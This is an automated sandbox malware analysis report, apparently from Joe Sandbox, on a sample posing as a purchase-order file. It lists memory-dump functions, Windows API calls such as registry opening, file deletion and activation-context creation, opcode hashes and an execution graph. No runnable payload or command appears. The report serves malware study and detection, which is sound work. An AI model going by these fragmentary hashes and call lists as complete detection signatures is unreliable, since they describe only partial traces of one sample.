                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: 23029ee0ef2c2764d311b021f972b636223d61688c1f0ce850b5c0a49ede76c8
                                                  • Instruction ID: a5fc347123d14ab73313393a3375c7955357ad4cef4e9a5cfbc4dc55302fc55b
                                                  • Opcode Fuzzy Hash: 23029ee0ef2c2764d311b021f972b636223d61688c1f0ce850b5c0a49ede76c8
                                                  • Instruction Fuzzy Hash: 5631EFB1D012589FCB10CF99C984ACEBFF5BF48314F59842AE829AB300D774A945CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF68D0 Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 05BF6998
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: fb9861803715ecfa9d189154bc806fb8e24c8ef135aaf659f9d7a476229ffbac
                                                  • Instruction ID: 38b269caa2372db6f4aad36593440fa4a684215051e94faf83ecec2f53b0685c
                                                  • Opcode Fuzzy Hash: fb9861803715ecfa9d189154bc806fb8e24c8ef135aaf659f9d7a476229ffbac
                                                  • Instruction Fuzzy Hash: DF31AA71D086899FCB10CFA9C804B9EBBB0FF49314F15C4AAD948EB241D778A945CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 064B6814 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 064B7E7C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 36db269853a719925157939fedb0166b65eb187a7558a0c765baa53d0773a230
                                                  • Instruction ID: ebc3bf1eb436d5a4d742ab76eeddd8e2bac4245c578ed5c814801a054247874e
                                                  • Opcode Fuzzy Hash: 36db269853a719925157939fedb0166b65eb187a7558a0c765baa53d0773a230
                                                  • Instruction Fuzzy Hash: 663112B1D042499FDB10CFA9C584ACEFFF5BF48304F28856AE409AB341C775A885CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF83A1 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 0b9067a68868cf8f49a047c5bd6421de42888537ad30dd17e12e48fb06868598
                                                  • Instruction ID: a0f34e884c9d29add9688265f4241f077176c608504ac1fa7e206d8d7007ced0
                                                  • Opcode Fuzzy Hash: 0b9067a68868cf8f49a047c5bd6421de42888537ad30dd17e12e48fb06868598
                                                  • Instruction Fuzzy Hash: F3411538A0522CCFCB61EF64D888699BBB2BF49305F5041D9E50AA7340CB716E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF83DD Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8624f1f1af4786bd6cfbbb6949fe7df8955c0735e72a34f7e2d024014fbb5086
                                                  • Instruction ID: edd89536ba49f2147ecb12cc1fae35b0dd6969fb130abca458ac3ee05d921fe4
                                                  • Opcode Fuzzy Hash: 8624f1f1af4786bd6cfbbb6949fe7df8955c0735e72a34f7e2d024014fbb5086
                                                  • Instruction Fuzzy Hash: 5F310438A0522CCFCB20EF64D98969DBBB2BF4A305F5041D9E50AA7340CB756E95CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF5D0C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 05BF6998
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: e350fed3012bf307d4d0ee5467562bfaa3682250dfe853ac04a2f2e746822f0e
                                                  • Instruction ID: 294cf3ac15dd00c52009f5e6021fcb56d8fd548e1040057c13fe42f261803f45
                                                  • Opcode Fuzzy Hash: e350fed3012bf307d4d0ee5467562bfaa3682250dfe853ac04a2f2e746822f0e
                                                  • Instruction Fuzzy Hash: 382147B1C046199BCB10CF9AC54479EFBF4FB48324F058569D919B7240D778A944CFE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00FC4CBB Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00FC4D42
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: 299fbbdd0752552e6e22abda9169dcc6d49538775fcbc8e7a1fd8b61d7dfea90
                                                  • Instruction ID: ed57c5ad6f452ded6f97dbdb05712a0dd8d9491b9a060c1308cff0ed70408c7f
                                                  • Opcode Fuzzy Hash: 299fbbdd0752552e6e22abda9169dcc6d49538775fcbc8e7a1fd8b61d7dfea90
                                                  • Instruction Fuzzy Hash: C821AEB1C003468FCB50DFA8D64979EBBF4FB04314F24882ED405A3681CB386549CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00FC4CC8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00FC4D42
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: d4304eacdd707965613039119399b386ccb759d3700427e6b390ad83d4f944f1
                                                  • Instruction ID: 8e9dfefdd9a45a705a1618dc9d1b7adb339c25435c459166d7f95417cc000194
                                                  • Opcode Fuzzy Hash: d4304eacdd707965613039119399b386ccb759d3700427e6b390ad83d4f944f1
                                                  • Instruction Fuzzy Hash: E5117CB1D1134A8FCB50EFA9D50979EBBF4FB44324F20892ED505A3681CB786548DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F6E16A Relevance: .4, Instructions: 362COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515095677.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f6d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17cdb43c31c4ebb5c6b7f654cadd3a39ece6df8dcd79ddd57a2b2ee4b1df04d7
                                                  • Instruction ID: 0b0169feb5d5208e69e6f02efebb2dc1d5493249ddce95ad6c529a5f5353fb9b
                                                  • Opcode Fuzzy Hash: 17cdb43c31c4ebb5c6b7f654cadd3a39ece6df8dcd79ddd57a2b2ee4b1df04d7
                                                  • Instruction Fuzzy Hash: C381407640E7C09FD7038B60CCA1B827FB5AF57325F1A81E6D084CA1A7D2699859C762
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F5D3EC Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.514983770.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f5d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef97c18bc9bc356dcec03934b83b0cd487726cf0e30145e28efb1cf9789c289e
                                                  • Instruction ID: fe45896e5746cf8a63d5aa93d3d1ecd465d5ce027fae420194590d75ee6caec3
                                                  • Opcode Fuzzy Hash: ef97c18bc9bc356dcec03934b83b0cd487726cf0e30145e28efb1cf9789c289e
                                                  • Instruction Fuzzy Hash: 202148B2505240DFCF14DF10D9C0B26BF65FB98325F24C569DE094B206C336E84AEBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F6E3DC Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515095677.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f6d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e16cb24f56c783b83535b2a99655771c36addbcce98803100ae291c526c7de14
                                                  • Instruction ID: ba638136f3a58d758a1ef9a6f554afd3375d54743f5376660c55a21aaba08fe9
                                                  • Opcode Fuzzy Hash: e16cb24f56c783b83535b2a99655771c36addbcce98803100ae291c526c7de14
                                                  • Instruction Fuzzy Hash: 0921077E604244DFDB04CF24D5C4B26BB65FB88328F24C569D9094B346CB7BD846EBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00F5D3E7 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.514983770.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f5d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction ID: 83b22d7c3c97a5c17e2710f091119002528d306c4e2f0f5414569a4ac9f7786a
                                                  • Opcode Fuzzy Hash: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction Fuzzy Hash: 9811AF76805280DFCF15CF10D9C4B16BF62FB94324F24C6A9DD080B616C33AE85ADBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:17.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:60
                                                  Total number of Limit Nodes:1
                                                  execution_graph 15315 127ded0 15316 127df12 15315->15316 15318 127df19 15315->15318 15317 127df6a CallWindowProcW 15316->15317 15316->15318 15317->15318 15309 8cd8d90 15310 8cd8f1b 15309->15310 15311 8cd8db6 15309->15311 15311->15310 15313 8cd9010 PostMessageW 15311->15313 15314 8cd907c 15313->15314 15314->15311 15319 1273f98 15320 1273fb2 15319->15320 15325 1275568 15320->15325 15321 1273fd3 15329 127376c 15321->15329 15326 1275578 15325->15326 15328 1275588 15326->15328 15336 1275650 15326->15336 15328->15321 15330 1273777 15329->15330 15331 1275568 CreateActCtxA 15330->15331 15332 1278369 15331->15332 15353 1278660 15332->15353 15358 1278652 15332->15358 15333 127838d 15337 1275675 15336->15337 15341 1275b41 15337->15341 15345 1275b50 15337->15345 15342 1275b50 15341->15342 15344 1275c54 15342->15344 15349 12757e4 15342->15349 15347 1275b77 15345->15347 15346 1275c54 15346->15346 15347->15346 15348 12757e4 CreateActCtxA 15347->15348 15348->15346 15350 1276be0 CreateActCtxA 15349->15350 15352 1276ca3 15350->15352 15352->15352 15354 1278677 15353->15354 15363 127869a 15354->15363 15368 12786a8 15354->15368 15355 1278687 15355->15333 15359 1278677 15358->15359 15361 127869a CreateActCtxA 15359->15361 15362 12786a8 CreateActCtxA 15359->15362 15360 1278687 15360->15333 15361->15360 15362->15360 15364 12786a8 15363->15364 15365 12786de 15364->15365 15373 1278768 15364->15373 15379 1278778 15364->15379 15365->15355 15369 12786c5 15368->15369 15370 12786de 15369->15370 15371 1278768 CreateActCtxA 15369->15371 15372 1278778 CreateActCtxA 15369->15372 15370->15355 15371->15370 15372->15370 15374 1278788 15373->15374 15375 1275568 CreateActCtxA 15374->15375 15376 1278798 15375->15376 15377 1275568 CreateActCtxA 15376->15377 15378 12787b3 15377->15378 15378->15365 15380 1278788 15379->15380 15381 1275568 CreateActCtxA 15380->15381 15382 1278798 15381->15382 15383 1275568 CreateActCtxA 15382->15383 15384 12787b3 15383->15384 15384->15365

                                                  Executed Functions

                                                  Function 012757E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 165 12757e4-1276ca1 CreateActCtxA 168 1276ca3-1276ca9 165->168 169 1276caa-1276d04 165->169 168->169 176 1276d06-1276d09 169->176 177 1276d13-1276d17 169->177 176->177 178 1276d19-1276d25 177->178 179 1276d28 177->179 178->179 181 1276d29 179->181 181->181
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 01276C91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 2be626ea5060063a4c1e07dec4241ed0edf8c663be0c9eb7230eb4bd09f49a29
                                                  • Instruction ID: dc83cdd18ecdec8245dcae737af6908151765ef27390ab4749c5e9c4a590f165
                                                  • Opcode Fuzzy Hash: 2be626ea5060063a4c1e07dec4241ed0edf8c663be0c9eb7230eb4bd09f49a29
                                                  • Instruction Fuzzy Hash: EF41D3B1C14618CBDB24CF99D884BDEBBB1FF89308F108069D508AB251DBB56985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01276BD6 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 182 1276bd6-1276ca1 CreateActCtxA 184 1276ca3-1276ca9 182->184 185 1276caa-1276d04 182->185 184->185 192 1276d06-1276d09 185->192 193 1276d13-1276d17 185->193 192->193 194 1276d19-1276d25 193->194 195 1276d28 193->195 194->195 197 1276d29 195->197 197->197
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 01276C91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 3e868da0f3919a7847a0d66e4dcce2fb2b7a0893c04d097e4dd82afb555cf40f
                                                  • Instruction ID: d0290293d13ec94c3d073fd69bbbab98448b28208685aa82a0356aaa76905a26
                                                  • Opcode Fuzzy Hash: 3e868da0f3919a7847a0d66e4dcce2fb2b7a0893c04d097e4dd82afb555cf40f
                                                  • Instruction Fuzzy Hash: 9541E5B1C14718CEDB24CFA9D884BDEBBB1FF89308F148069D509AB250DBB56985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0127DED0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 198 127ded0-127df0c 199 127df12-127df17 198->199 200 127dfbc-127dfdc 198->200 201 127df6a-127dfa2 CallWindowProcW 199->201 202 127df19-127df50 199->202 206 127dfdf-127dfec 200->206 204 127dfa4-127dfaa 201->204 205 127dfab-127dfba 201->205 208 127df52-127df58 202->208 209 127df59-127df68 202->209 204->205 205->206 208->209 209->206
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0127DF91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1215cef6048a52465af6b2acaa9d5349fe0779ca7c8cc8eada11505204b79f03
                                                  • Instruction ID: cec3c4a2f8baed84d1a2d40f7affb15b587ae05ac2f5e1789255623ae6d5160d
                                                  • Opcode Fuzzy Hash: 1215cef6048a52465af6b2acaa9d5349fe0779ca7c8cc8eada11505204b79f03
                                                  • Instruction Fuzzy Hash: A74146B4A103498FDB14CF99C488AABBBF5FF88314F248458E519AB321D774A941CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08CD9010 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 212 8cd9010-8cd907a PostMessageW 213 8cd907c-8cd9082 212->213 214 8cd9083-8cd9097 212->214 213->214
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 08CD906D
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.363626002.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_8cd0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 971a4db483c12b031ea91a3385293d214c7bafc0fbd422411aa794da8a927171
                                                  • Instruction ID: bd74071a912d246496a54ae5616f7db0c5e62923c8d32a3c6faffdd3b0ed6485
                                                  • Opcode Fuzzy Hash: 971a4db483c12b031ea91a3385293d214c7bafc0fbd422411aa794da8a927171
                                                  • Instruction Fuzzy Hash: 4E11D0B59043499FDB10DF99D885BDEBBF8EB48324F10841AE954A7600C379A984CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051817A2 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 315 51817a2-51848cf 325 5180a2b-5180a31 315->325 326 51848d5 315->326 327 5180a3a-5183e93 call 5180750 325->327 328 5180a33-518468c call 5180730 * 2 325->328 329 51848d6 326->329 344 5184698-51846be 328->344 329->329 344->325 346 51846c4-51846cc 344->346 346->325
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  • Opcode ID: a53643b263e64173fa381d9040be2eedb239631cd776465107a8c848b9f76f99
                                                  • Instruction ID: 71d03ae294ae67e6dc3c6bf329071c9253c6b9ecfd9a41ee95bfe162c2fb7d80
                                                  • Opcode Fuzzy Hash: a53643b263e64173fa381d9040be2eedb239631cd776465107a8c848b9f76f99
                                                  • Instruction Fuzzy Hash: 40314674A11269CFDB25DF64D898AA8BBB5FB4A304F0181DAE409A7350DB70AF85CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051815D7 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 347 51815d7-518268f call 5189870 call 5180720 call 518d9c8 358 5182695-5182696 347->358
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 1205e921772c6df49eaa93b6678d22d75b929e67a121356226cf1ad8868afd94
                                                  • Instruction ID: 211d92de30fed21b15970a9ec1abbd6efef1b7825c849c9d9f3d415c03343948
                                                  • Opcode Fuzzy Hash: 1205e921772c6df49eaa93b6678d22d75b929e67a121356226cf1ad8868afd94
                                                  • Instruction Fuzzy Hash: 38218974A4021A8FCB65EF24D894BAEBBF5FB49304F1180E5A50CA7394CB309E81CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05181188 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 361 5181188-51811f7 364 5181203-51839b0 361->364
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4
                                                  • API String ID: 0-4088798008
                                                  • Opcode ID: 15e58b561e3dbd9417e249b12f4f3ce880b5c430eaf738a239f4bb8af1c7e28c
                                                  • Instruction ID: 4af3d73de42a996136420dcce1caed0e46a05a79502ca046b647fc6de3ed9420
                                                  • Opcode Fuzzy Hash: 15e58b561e3dbd9417e249b12f4f3ce880b5c430eaf738a239f4bb8af1c7e28c
                                                  • Instruction Fuzzy Hash: 4F111530A102189FDB54EB28C954BEAB7B2FF8A300F5182D9E449A7754EF305E859F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05180A5B Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 368 5180a5b-5180aba call 5189248 372 5180a2b-5180a31 368->372 373 5180ac0-5180ac1 368->373 375 5180a3a-5183e93 call 5180750 372->375 376 5180a33-518468c call 5180730 * 2 372->376 373->372 391 5184698-51846be 376->391 391->372 393 51846c4-51846cc 391->393 393->372
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: acdef16839dcb05ba84cca9217f67672fde8c82a9754ecd744c025737385ef79
                                                  • Instruction ID: db394075d6f5af2a1f2dfbf6bc962537763a64ee7ad3c90d1cfdea4744433b82
                                                  • Opcode Fuzzy Hash: acdef16839dcb05ba84cca9217f67672fde8c82a9754ecd744c025737385ef79
                                                  • Instruction Fuzzy Hash: 13111574A08269CFDB68EF68D898AADB7B1FB09304F0185E9D049A7240DF305A85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05183490 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 395 5183490-5183a2e 401 5183a39-5183a3a 395->401
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  • Opcode ID: 5e2b466f586d01e0436f7dec8524eb4b53d7f07d31057cbf5859154edd9438aa
                                                  • Instruction ID: 24f82f18fbeef2d905cb16d79e382fb2b6cb490258c3ae6f7a35c61715b16bd8
                                                  • Opcode Fuzzy Hash: 5e2b466f586d01e0436f7dec8524eb4b53d7f07d31057cbf5859154edd9438aa
                                                  • Instruction Fuzzy Hash: 26018830A1021A8FD714EF64D9496AEBBB1FF4A301F1041A5E04A77684EB306A85CF82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05184834 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  • Opcode ID: da5bfa6d2c8e759ef3d2406aa0448280021818979b61511c98668ebc987eede9
                                                  • Instruction ID: ef8cbc22f683c3d644f8519125da868ee5587906119f3d3a6bca9593d77d58de
                                                  • Opcode Fuzzy Hash: da5bfa6d2c8e759ef3d2406aa0448280021818979b61511c98668ebc987eede9
                                                  • Instruction Fuzzy Hash: D401C5349203698FCB61EB24D8947ACB7B5FB49340F0042D6A409B7280DBB05BC4CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05189C2C Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6dee82bdc84b43d90ebc5f25ff617020f274c8041f24222df1e41805848c0f85
                                                  • Instruction ID: ac82fdccb2cd308ca26b1e8417ab2563b916ebfce061f911a64392b59f860558
                                                  • Opcode Fuzzy Hash: 6dee82bdc84b43d90ebc5f25ff617020f274c8041f24222df1e41805848c0f85
                                                  • Instruction Fuzzy Hash: C871F1707042149FCB24EB78D855A7F7AF7EF89208F104569E50AEB384CF349C0A8B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518EF00 Relevance: .2, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd0ab6d05e2ff0eef898f7e824671f09ad19dfde556ba0e933a106f1cc62bd3c
